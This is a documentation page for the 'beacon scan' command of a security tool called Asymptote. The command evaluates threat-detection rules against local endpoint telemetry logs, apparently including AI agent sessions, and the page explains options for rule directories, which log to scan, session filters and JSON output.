Run local scans - Asymptote

Command Overview

Run beacon scan after endpoint telemetry is flowing to evaluate the runtime log with active threat-detection rules.

Run a local scan

beacon scan

Scanning is read-only. It loads local telemetry from the resolved runtime JSONL log, evaluates rules in memory, and prints findings without contacting the network.

Rule selection

Beacon chooses rules in this order:

Rules in the local rule store.
The built-in baseline rules when no store is installed.
The directory passed with --rules, when you want an explicit rule pack for one scan.

Scan with an explicit rule directory

beacon scan --rules ./rules

Runtime log selection

Use per-user endpoint paths by default:

Scan user-mode telemetry

beacon scan --user

Scan system-mode telemetry:

Scan system-mode telemetry

sudo beacon scan --system

Scan a copied or exported runtime log:

Scan a specific runtime log

beacon scan --log-path ./runtime.jsonl

Session filtering

Filter to one session id substring when you are investigating a known agent run:

Scan one session

beacon scan --session claude-session-123

Output

Human-readable output summarizes each finding, its severity, rule id, reason, session, and matched events. For JSON output, use:

Print JSON findings

beacon scan --json

Use scan gates

Filter findings and fail automation on severity thresholds.

beacon rules

Manage the rules used by local scans.

⌘I

​Command Overview

​Rule selection

​Runtime log selection

​Session filtering

​Output

​Related